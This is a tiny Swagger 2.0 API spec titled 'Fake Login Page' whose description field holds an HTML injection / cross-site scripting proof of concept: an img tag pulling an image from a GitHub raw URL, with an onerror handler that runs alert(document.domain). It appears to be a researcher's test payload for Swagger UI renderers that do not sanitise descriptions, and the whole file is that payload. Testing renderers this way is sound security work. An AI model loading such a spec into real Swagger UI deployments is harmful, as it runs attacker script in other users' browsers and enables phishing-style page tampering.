swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '
        <h1>HTML Injection by Raman_MG : IMG injected</h1>
        <img src=//raw.githubusercontent.com/RamanMG/swagger-xss/refs/heads/main/savage.jpg onerror=alert(document.domain)>
    '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful